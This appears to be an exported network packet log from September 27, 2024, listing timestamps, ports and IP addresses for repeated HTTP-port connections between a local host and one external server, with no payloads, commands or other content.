Sep 27, 2024 17:32:14.308444977 CEST	80	57538	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:14.308511019 CEST	57538	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:14.308809996 CEST	80	57539	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:14.309005022 CEST	57539	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:14.309135914 CEST	57539	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:14.314357996 CEST	80	57539	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:15.019023895 CEST	80	57539	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:15.019150972 CEST	57539	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.138062954 CEST	57539	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.138329983 CEST	57540	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.143559933 CEST	80	57539	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:15.143601894 CEST	80	57540	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:15.143649101 CEST	57539	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.143690109 CEST	57540	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.143862963 CEST	57540	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.148768902 CEST	80	57540	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:15.855298996 CEST	80	57540	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:15.855427027 CEST	57540	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.976039886 CEST	57540	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.978034019 CEST	57541	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.981439114 CEST	80	57540	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:15.981551886 CEST	57540	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.983761072 CEST	80	57541	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:15.983846903 CEST	57541	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.984002113 CEST	57541	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:15.989377022 CEST	80	57541	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:16.706841946 CEST	80	57541	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:16.706911087 CEST	57541	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:16.818640947 CEST	57541	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:16.823793888 CEST	80	57541	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:17.056643963 CEST	80	57541	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:17.056711912 CEST	57541	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:17.178730011 CEST	57541	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:17.179307938 CEST	57543	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:17.185003996 CEST	80	57543	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:17.185082912 CEST	57543	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:17.185090065 CEST	80	57541	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:17.185165882 CEST	57541	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:17.185475111 CEST	57543	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:17.190468073 CEST	80	57543	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:17.927685976 CEST	80	57543	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:17.927819014 CEST	57543	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:18.037250042 CEST	57543	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:18.042319059 CEST	80	57543	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:18.381916046 CEST	80	57543	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:18.382122993 CEST	57543	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:18.490320921 CEST	57543	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:18.499423981 CEST	80	57543	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:18.733568907 CEST	80	57543	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:18.733642101 CEST	57543	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:18.880280972 CEST	57543	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:18.880731106 CEST	57544	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:18.885951042 CEST	80	57543	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:18.886042118 CEST	80	57544	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:18.886178970 CEST	57543	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:18.886204958 CEST	57544	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:18.886420012 CEST	57544	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:18.891732931 CEST	80	57544	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:19.582662106 CEST	80	57544	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:19.582794905 CEST	57544	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:19.695391893 CEST	57544	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:19.700851917 CEST	80	57544	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:19.930829048 CEST	80	57544	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:19.931094885 CEST	57544	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.054023027 CEST	57544	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.054394960 CEST	57545	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.059468031 CEST	80	57544	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:20.059530973 CEST	57544	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.060847998 CEST	80	57545	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:20.060915947 CEST	57545	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.061382055 CEST	57545	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.066521883 CEST	80	57545	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:20.791169882 CEST	80	57545	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:20.791335106 CEST	57545	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.913791895 CEST	57545	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.914212942 CEST	57547	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.935750008 CEST	80	57547	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:20.935973883 CEST	57547	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.936188936 CEST	80	57545	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:20.936194897 CEST	57547	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.936263084 CEST	57545	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:20.944658041 CEST	80	57547	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:21.648509026 CEST	80	57547	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:21.648710012 CEST	57547	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:21.776375055 CEST	57547	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:21.785347939 CEST	80	57547	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:22.019803047 CEST	80	57547	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:22.019902945 CEST	57547	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:22.226665020 CEST	57547	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:22.227411985 CEST	57548	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:22.234528065 CEST	80	57548	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:22.234606028 CEST	57548	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:22.235565901 CEST	80	57547	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:22.235645056 CEST	57547	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:22.323118925 CEST	57548	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:22.329309940 CEST	80	57548	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:22.948270082 CEST	80	57548	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:22.948396921 CEST	57548	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:23.070029974 CEST	57548	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:23.070327997 CEST	57549	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:23.093708038 CEST	80	57549	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:23.094060898 CEST	57549	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:23.094127893 CEST	57549	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:23.094749928 CEST	80	57548	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:23.094820976 CEST	57548	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:23.101970911 CEST	80	57549	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:23.788425922 CEST	80	57549	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:23.788572073 CEST	57549	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:23.897870064 CEST	57549	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:23.904593945 CEST	80	57549	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:24.221721888 CEST	80	57549	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:24.221833944 CEST	57549	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:24.334002972 CEST	57549	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:24.341485023 CEST	80	57549	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:24.572361946 CEST	80	57549	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:24.572523117 CEST	57549	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:24.709328890 CEST	57549	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:24.709652901 CEST	57550	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:24.714659929 CEST	80	57549	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:24.714740038 CEST	57549	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:24.715075970 CEST	80	57550	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:24.715161085 CEST	57550	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:24.715336084 CEST	57550	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:24.720508099 CEST	80	57550	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:25.416487932 CEST	80	57550	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:25.416568995 CEST	57550	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:25.538722992 CEST	57550	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:25.539063931 CEST	57551	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:25.544220924 CEST	80	57551	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:25.544377089 CEST	80	57550	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:25.544378996 CEST	57551	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:25.544435024 CEST	57550	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:25.544553041 CEST	57551	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:25.549863100 CEST	80	57551	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:26.238362074 CEST	80	57551	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:26.238460064 CEST	57551	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:26.349770069 CEST	57551	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:26.357597113 CEST	80	57551	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:26.620265007 CEST	80	57551	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:26.620409012 CEST	57551	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:26.741010904 CEST	57551	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:26.741281986 CEST	57552	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:26.746634007 CEST	80	57551	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:26.746702909 CEST	57551	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:26.746864080 CEST	80	57552	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:26.746952057 CEST	57552	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:26.747193098 CEST	57552	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:26.752331972 CEST	80	57552	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:27.662174940 CEST	80	57552	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:27.662405968 CEST	57552	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:27.665425062 CEST	80	57552	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:27.665484905 CEST	57552	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:27.775023937 CEST	57552	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:27.781681061 CEST	80	57552	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:28.011087894 CEST	80	57552	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:28.011305094 CEST	57552	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:28.189316988 CEST	57552	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:28.189733028 CEST	57553	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:28.194720984 CEST	80	57553	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:28.194858074 CEST	57553	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:28.194942951 CEST	57553	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:28.195715904 CEST	80	57552	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:28.195780993 CEST	57552	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:28.200001001 CEST	80	57553	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:28.893805981 CEST	80	57553	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:28.894011021 CEST	57553	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:29.007306099 CEST	57553	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:29.012238979 CEST	80	57553	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:29.249866009 CEST	80	57553	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:29.250014067 CEST	57553	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:29.366707087 CEST	57553	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:29.366911888 CEST	57554	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:29.371973038 CEST	80	57554	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:29.372095108 CEST	57554	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:29.372184992 CEST	80	57553	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:29.372248888 CEST	57553	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:29.372437000 CEST	57554	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:29.377343893 CEST	80	57554	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:30.081671000 CEST	80	57554	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:30.081908941 CEST	57554	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:30.198513985 CEST	57554	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:30.203428984 CEST	80	57554	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:30.439491034 CEST	80	57554	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:30.439563990 CEST	57554	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:30.555721998 CEST	57554	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:30.556090117 CEST	57555	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:30.561175108 CEST	80	57555	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:30.561206102 CEST	80	57554	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:30.561271906 CEST	57555	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:30.561332941 CEST	57554	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:30.565201044 CEST	57555	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:30.570049047 CEST	80	57555	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:31.293672085 CEST	80	57555	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:31.293798923 CEST	57555	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:31.492887020 CEST	57555	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:31.493257999 CEST	57556	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:31.499048948 CEST	80	57556	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:31.499135971 CEST	57556	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:31.499277115 CEST	80	57555	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:31.499336958 CEST	57555	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:31.500194073 CEST	57556	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:31.504976988 CEST	80	57556	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:32.209187984 CEST	80	57556	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:32.209369898 CEST	57556	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:32.319962025 CEST	57556	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:32.325781107 CEST	80	57556	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:32.559019089 CEST	80	57556	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:32.559173107 CEST	57556	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:32.679567099 CEST	57556	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:32.680027962 CEST	57557	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:32.689781904 CEST	80	57557	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:32.689908028 CEST	57557	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:32.690319061 CEST	57557	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:32.691375971 CEST	80	57556	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:32.691442013 CEST	57556	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:32.695538044 CEST	80	57557	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:33.392370939 CEST	80	57557	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:33.392447948 CEST	57557	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:33.510889053 CEST	57557	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:33.511259079 CEST	57558	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:33.516138077 CEST	80	57558	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:33.516248941 CEST	57558	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:33.516256094 CEST	80	57557	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:33.516350031 CEST	57557	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:33.516614914 CEST	57558	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:33.521473885 CEST	80	57558	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:34.215002060 CEST	80	57558	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:34.215126038 CEST	57558	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:34.335546970 CEST	57558	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:34.335958004 CEST	57559	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:34.340858936 CEST	80	57558	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:34.340998888 CEST	57558	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:34.341268063 CEST	80	57559	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:34.341370106 CEST	57559	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:34.341538906 CEST	57559	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:34.346564054 CEST	80	57559	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:35.049894094 CEST	80	57559	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:35.049985886 CEST	57559	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:35.163914919 CEST	57559	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:35.169114113 CEST	80	57559	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:35.411149025 CEST	80	57559	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:35.411257029 CEST	57559	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:35.523046017 CEST	57559	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:35.528268099 CEST	80	57559	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:35.763844013 CEST	80	57559	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:35.763988018 CEST	57559	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:35.881186008 CEST	57559	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:35.882026911 CEST	57560	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:35.886912107 CEST	80	57559	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:35.887052059 CEST	57559	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:35.887330055 CEST	80	57560	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:35.887443066 CEST	57560	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:35.887816906 CEST	57560	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:35.892852068 CEST	80	57560	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:36.593708038 CEST	80	57560	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:36.594047070 CEST	57560	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:36.709235907 CEST	57560	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:36.709538937 CEST	57561	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:36.714680910 CEST	80	57560	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:36.714813948 CEST	57560	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:36.715214968 CEST	80	57561	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:36.715287924 CEST	57561	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:36.715512991 CEST	57561	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:36.720536947 CEST	80	57561	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:37.422297955 CEST	80	57561	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:37.422418118 CEST	57561	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:37.539115906 CEST	57561	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:37.539392948 CEST	57562	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:37.544430971 CEST	80	57561	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:37.544517040 CEST	57561	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:37.544603109 CEST	80	57562	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:37.544667959 CEST	57562	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:37.544811964 CEST	57562	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:37.549809933 CEST	80	57562	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:38.261061907 CEST	80	57562	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:38.261245966 CEST	57562	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:38.573496103 CEST	57562	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:38.573793888 CEST	57563	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:38.579113007 CEST	80	57562	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:38.579190016 CEST	80	57563	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:38.579190969 CEST	57562	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:38.579263926 CEST	57563	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:38.579432011 CEST	57563	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:38.584592104 CEST	80	57563	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:39.289077997 CEST	80	57563	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:39.289194107 CEST	57563	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:39.411735058 CEST	57563	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:39.412092924 CEST	57564	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:39.417205095 CEST	80	57564	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:39.417356014 CEST	57564	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:39.417424917 CEST	80	57563	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:39.417458057 CEST	57564	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:39.417474985 CEST	57563	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:39.422401905 CEST	80	57564	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:40.123241901 CEST	80	57564	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:40.123338938 CEST	57564	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:40.240262032 CEST	57564	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:40.240572929 CEST	57565	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:40.245757103 CEST	80	57564	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:40.245826006 CEST	57564	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:40.245971918 CEST	80	57565	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:40.246041059 CEST	57565	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:40.246184111 CEST	57565	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:40.251151085 CEST	80	57565	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:40.924777031 CEST	80	57565	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:40.924875975 CEST	57565	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:41.168057919 CEST	57565	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:41.168339014 CEST	57566	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:41.173345089 CEST	80	57566	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:41.173413038 CEST	57566	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:41.173486948 CEST	80	57565	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:41.173532009 CEST	57565	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:41.173532009 CEST	57566	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:41.178508997 CEST	80	57566	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:41.880575895 CEST	80	57566	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:41.880650997 CEST	57566	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:41.990983963 CEST	57566	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:41.995995998 CEST	80	57566	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:42.250861883 CEST	80	57566	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:42.250933886 CEST	57566	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:42.365155935 CEST	57566	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:42.365473986 CEST	57567	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:42.370364904 CEST	80	57567	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:42.370456934 CEST	57567	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:42.370565891 CEST	80	57566	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:42.370582104 CEST	57567	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:42.370620012 CEST	57566	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:42.375344038 CEST	80	57567	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:43.068851948 CEST	80	57567	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:43.068978071 CEST	57567	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:43.177799940 CEST	57567	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:43.182832956 CEST	80	57567	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:43.421175957 CEST	80	57567	185.208.158.248	192.168.2.6
